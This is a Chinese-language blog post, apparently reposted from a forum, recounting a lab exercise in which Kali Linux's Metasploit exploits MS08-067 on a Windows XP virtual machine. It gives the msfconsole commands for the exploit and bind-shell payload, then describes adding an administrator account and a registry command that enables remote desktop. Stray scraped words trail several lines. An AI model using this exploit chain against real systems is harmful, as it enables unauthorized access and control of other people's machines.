MSF初體驗 - kali linux 入侵XP系統

最近作某安全競賽平臺的比賽,真正開始接觸Metasploit這一滲透神器,同時也是裝逼神器(2333….),下面記錄一下初步使用Metasploit的過程。
首先在百度百科摘錄了一段關於Metasploit Framework 的簡要介紹。
Metasploit是一個免費的、可下載的框架,經過它能夠很容易地獲取、開發並對計算機軟件漏洞實施攻擊。它自己附帶數百個已知軟件漏洞的專業級漏洞攻擊工具。當H.D. Moore在2003年發佈Metasploit時,計算機安全情況也被永久性地改變了。彷彿一晚上之間,任何人均可以成爲黑客,每一個人均可以使用攻擊工具來攻擊那些未打過補丁或者剛剛打過補丁的漏洞。軟件廠商不再能推遲發佈針對已公佈漏洞的補丁了,這是由於Metasploit團隊一直都在努力開發各類攻擊工具,並將它們貢獻給全部Metasploit用戶。
Metasploit的設計初衷是打形成一個攻擊工具開發平臺,安全專家以及業餘安全愛好者更多地將其看成一種點幾下鼠標就能夠利用其中附帶的攻擊工具進行成功攻擊的環境。
說再多也不如真情實彈的幹不是。
我用VMware搭建了一個實驗環境,下面是網絡的拓撲圖:shell

要作的就是用Kali Linux裏的Metasploit入侵WinXP,而後從物理機,也就是Win7的遠程桌面連進WinXP 系統。
首先,在Kali用命令  msfconsole 開啓Metasploit。windows

而後運行以下命令:
use exploit/windows/smb/ms08_067_netapi                #使用MS08067漏洞攻擊程序
set LHOST 192.168.116.3                                                      #設置本地主機IP
set RHOST 192.168.116.116                                                   #設置目標主機IP
set payload windows/shell_bind_tcp                                 #設置payload
show options                                                                            #查看設置信息
exploit                                                                                        #實施攻擊
由圖可知,攻擊成功,咱們獲得了一個cmdshell,接下來就是新建帳戶了。api

添加用戶名爲zeal,密碼爲zeal的用戶,並把zeal用戶添加到管理組。
接下來執行命令 netstat -an 看一下目標主機開放端口的狀況。安全

發現並無開啓3389(遠程桌面鏈接端口),咱們須要手動開啓。須要執行命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server /v fDenyTSConnections /t REG_DWORD /d 0 /f網絡

而後,咱們在物理機(Win7)運行 mstsc進行遠程桌面鏈接。框架

OK,成功入侵目標主機。
Metasploit 就是一款這麼強大的工具,使滲透測試人員如虎添翼,幾個命令就入侵了目標主機。它的強大功能不言而喻。
接下來,我會繼續研究Metasploit的使用,並記錄本身的學習過程,但願能給各位必定的幫助。tcp

轉自http://tieba.baidu.com/p/3715441716工具

相關文章
相關標籤/搜索